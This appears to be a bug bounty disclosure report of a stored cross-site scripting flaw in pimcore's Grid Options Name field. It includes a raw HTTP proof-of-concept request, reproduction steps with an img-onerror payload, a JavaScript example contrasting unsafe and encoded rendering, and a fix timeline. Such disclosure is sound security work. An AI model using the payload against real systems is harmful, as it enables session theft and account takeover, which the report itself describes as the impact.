Cross-site Scripting (XSS) - Stored in pimcore/pimcore

Valid

Reported on

Mar 4th 2022


Description

Stored XSS in the Name parameter when saving Grid Options

Proof of Concept

// PoC.req
POST /admin/object-helper/grid-save-column-config HTTP/1.1
Host: 10.x-dev.pimcore.fun
Cookie: PHPSESSID=cef9a977bc8ae8591f7b3b14bcafedf4; pimcore_admin_sid=1; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDY0MDc3MTUuNjQzNDYyLCJwdGciOnsiX20iOjEsIl9jIjoxNjQ2NDA3NTE1LCJfdSI6MTY0NjQwNzcxNSwidmk6c3J1IjpbN119LCJleHAiOjE2NDY0MDk1MTV9.TSYQ87XOy6JUG6eCkdGu0O_r5KiN7unQr1qOIwQ6HKQ; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDY0MDc3MTUuNjQzNTMsInB0ZyI6eyJjbWY6c2ciOnsiODYwIjoxfSwiX2MiOjE2NDY0MDc1MTUsIl91IjoxNjQ2NDA3NTE1fSwiZXhwIjoxNjc3OTQzNzE1fQ.NzpeEedWPQiAv-DK5_6_sxcktFG5WCj4SMXg7nYeKUI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.x-dev.pimcore.fun/admin/?_dc=1646407514&perspective=
X-Pimcore-Csrf-Token: 823ca1bd46711728be4d0851176b0a91e070f17e
X-Pimcore-Extjs-Version-Major: 7
X-Pimcore-Extjs-Version-Minor: 0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5481
Origin: https://10.x-dev.pimcore.fun
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

id=1086&class_id=CAR&gridconfig=%7B%22language%22%3A%22en%22%2C%22pageSize%22%3A25%2C%22sortinfo%22%3Afalse%2C%22classId%22%3A%22CAR%22%2C%22columns%22%3A%7B%22id%22%3A%7B%22name%22%3A%22id%22%2C%22position%22%3A1%2C%22hidden%22%3Afalse%2C%22width%22%3A52%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22id%22%2C%22type%22%3A%22system%22%2C%22label%22%3A%22id%22%2C%22position%22%3A0%7D%7D%2C%22fullpath%22%3A%7B%22name%22%3A%22fullpath%22%2C%22position%22%3A2%2C%22hidden%22%3Afalse%2C%22width%22%3A219%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22fullpath%22%2C%22type%22%3A%22system%22%2C%22label%22%3A%22fullpath%22%2C%22position%22%3A1%7D%7D%2C%22published%22%3A%7B%22name%22%3A%22published%22%2C%22position%22%3A3%2C%22hidden%22%3Afalse%2C%22width%22%3A40%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22published%22%2C%22type%22%3A%22system%22%2C%22label%22%3A%22published%22%2C%22position%22%3A2%7D%7D%2C%22name%22%3A%7B%22name%22%3A%22name%22%2C%22position%22%3A4%2C%22hidden%22%3Afalse%2C%22width%22%3A63%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22name%22%2C%22type%22%3A%22input%22%2C%22label%22%3A%22Name%22%2C%22config%22%3A%7B%22width%22%3Anull%7D%2C%22layout%22%3A%7B%22fieldtype%22%3A%22input%22%2C%22width%22%3Anull%2C%22defaultValue%22%3Anull%2C%22queryColumnType%22%3A%22varchar%22%2C%22columnType%22%3A%22varchar%22%2C%22columnLength%22%3A190%2C%22regex%22%3A%22%22%2C%22unique%22%3Afalse%2C%22showCharCount%22%3Afalse%2C%22name%22%3A%22name%22%2C%22title%22%3A%22Name%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Atrue%2C%22visibleSearch%22%3Atrue%2C%22defaultValueGenerator%22%3A%22%22%7D%2C%22position%22%3A3%7D%7D%2C%22bodyStyle%22%3A%7B%22name%22%3A%22bodyStyle%22%
2C%22position%22%3A5%2C%22hidden%22%3Afalse%2C%22width%22%3A400%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22bodyStyle%22%2C%22type%22%3A%22manyToOneRelation%22%2C%22label%22%3A%22Body%20Style%22%2C%22config%22%3A%7B%22width%22%3A400%7D%2C%22layout%22%3A%7B%22fieldtype%22%3A%22manyToOneRelation%22%2C%22width%22%3A400%2C%22assetUploadPath%22%3A%22%22%2C%22relationType%22%3Atrue%2C%22queryColumnType%22%3A%7B%22id%22%3A%22int(11)%22%2C%22type%22%3A%22enum('document'%2C'asset'%2C'object')%22%7D%2C%22objectsAllowed%22%3Atrue%2C%22assetsAllowed%22%3Afalse%2C%22assetTypes%22%3A%5B%5D%2C%22documentsAllowed%22%3Afalse%2C%22documentTypes%22%3A%5B%5D%2C%22classes%22%3A%5B%7B%22classes%22%3A%22BodyStyle%22%7D%5D%2C%22pathFormatterClass%22%3A%22%22%2C%22name%22%3A%22bodyStyle%22%2C%22title%22%3A%22Body%20Style%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Atrue%2C%22visibleSearch%22%3Atrue%7D%2C%22position%22%3A4%7D%7D%2C%22color%22%3A%7B%22name%22%3A%22color%22%2C%22position%22%3A6%2C%22hidden%22%3Afalse%2C%22width%22%3A60%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22color%22%2C%22type%22%3A%22multiselect%22%2C%22label%22%3A%22Color%22%2C%22config%22%3A%7B%22width%22%3A%22%22%2C%22height%22%3A%22%22%7D%2C%22layout%22%3A%7B%22fieldtype%22%3A%22multiselect%22%2C%22options%22%3A%5B%7B%22key%22%3A%22grey%22%2C%22value%22%3A%22grey%22%7D%2C%7B%22key%22%3A%22beige%22%2C%22value%22%3A%22beige%22%7D%2C%7B%22key%22%3A%22silver%22%2C%22value%22%3A%22silver%22%7D%2C%7B%22key%22%3A%22brown%22%2C%22value%22%3A%22brown%22%7D%2C%7B%22key%22%3A%22orange%22%2C%22value%22%3A%22orange%22%7D%2C%7B%22key%22%3A%22yellow%22%2C%22value%22%3A%22yellow%22%7D%2C%7B%22key%22%3A%22blue%22%2C%22value%22%3A%22blue%22%7D%2C%7B%22key%22%3A%22black%22%2C%22value%22%3A
%22black%22%7D%2C%7B%22key%22%3A%22green%22%2C%22value%22%3A%22green%22%7D%2C%7B%22key%22%3A%22red%22%2C%22value%22%3A%22red%22%7D%2C%7B%22key%22%3A%22white%22%2C%22value%22%3A%22white%22%7D%5D%2C%22width%22%3A%22%22%2C%22height%22%3A%22%22%2C%22maxItems%22%3A%22%22%2C%22renderType%22%3A%22list%22%2C%22optionsProviderClass%22%3A%22%22%2C%22optionsProviderData%22%3A%22%22%2C%22queryColumnType%22%3A%22text%22%2C%22columnType%22%3A%22text%22%2C%22dynamicOptions%22%3Afalse%2C%22name%22%3A%22color%22%2C%22title%22%3A%22Color%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Atrue%2C%22visibleSearch%22%3Atrue%7D%2C%22position%22%3A5%7D%7D%7D%2C%22onlyDirectChildren%22%3Afalse%2C%22searchFilter%22%3A%22%22%2C%22sqlFilter%22%3A%22%22%7D&searchType=folder&settings=%7B%22sharedUserIds%22%3A%22%22%2C%22sharedRoleIds%22%3A%22%22%2C%22gridConfigId%22%3Anull%2C%22gridConfigName%22%3A%22%5C%22%3E%3CiMg%20SrC%3D%5C%22x%5C%22%20oNeRRor%3D%5C%22alert(1)%3B%5C%22%3E%22%2C%22gridConfigDescription%22%3A%22%22%2C%22owner%22%3A%22admin%22%2C%22modificationDate%22%3A%22Fri%20Mar%2004%202022%2022%3A55%3A25%20GMT%2B0700%20(Indochina%20Time)%22%2C%22shareGlobally%22%3Afalse%2C%22setAsFavourite%22%3Afalse%2C%22isShared%22%3Atrue%7D&context=&type=object

Steps to Reproduce

After logging in at https://10.x-dev.pimcore.fun/admin

Go to Data Objects and click any folder, such as Events, Shop or upload

Then choose Save Grid Options, or click Grid Options in the Save & Share tab

In the Name field, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">

The XSS triggers when the user clicks the dropdown in Grid Options
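The defect behind these steps, as an added example (not pimcore's code; the dropdown markup is assumed, and the escaping mirrors what Ext.util.Format.htmlEncode does): the gridConfigName from the saved settings is concatenated into the Grid Options list as HTML, so the payload runs, while HTML-encoding the name first renders it as plain text. The settings field below is a trimmed, constructed copy of the one in the PoC request.

```javascript
// Added example, not pimcore's code. The <li> markup is assumed; the
// escaping mirrors Ext.util.Format.htmlEncode.

// Constructed: a trimmed copy of the `settings` form field from the PoC request.
const SETTINGS_FIELD = 'settings=%7B%22gridConfigId%22%3Anull%2C%22gridConfigName%22%3A%22'
  + '%5C%22%3E%3CiMg%20SrC%3D%5C%22x%5C%22%20oNeRRor%3D%5C%22alert(1)%3B%5C%22%3E%22'
  + '%2C%22owner%22%3A%22admin%22%7D';

// grid-save-column-config receives `settings` as URL-encoded JSON; this is
// the decode step that recovers the name the admin typed.
function parseSettings(body) {
  const raw = new URLSearchParams(body).get('settings');
  return JSON.parse(raw);
}

// Minimal HTML encoder: the five characters that can break out of text
// or attribute context.
function htmlEncode(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable renderer: the saved name is concatenated straight into the
// dropdown item, so a name containing a tag becomes live markup.
function renderOptionUnsafe(settings) {
  return '<li class="x-boundlist-item">' + settings.gridConfigName + '</li>';
}

// Hardened renderer: the name is HTML-encoded, so it is displayed as text.
function renderOptionSafe(settings) {
  return '<li class="x-boundlist-item">' + htmlEncode(settings.gridConfigName) + '</li>';
}

// Review check: does a tag start (`<` followed by a letter) survive inside
// the item body after rendering?
function bodyContainsMarkup(html) {
  const body = html.slice(html.indexOf('>') + 1, html.lastIndexOf('</li>'));
  return /<[a-z]/i.test(body);
}
```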

Image PoC

[screenshot: poc]

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the pimcore team within 24 hours. 3 months ago
We have contacted a member of the pimcore team and are waiting to hear back 3 months ago
We have sent a follow up to the pimcore team. We will try again in 7 days. 3 months ago
Divesh Pahuja validated this vulnerability 3 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the pimcore team. We will try again in 7 days. 3 months ago
Divesh Pahuja confirmed that a fix has been merged on 6e0922 2 months ago
Divesh Pahuja has been awarded the fix bounty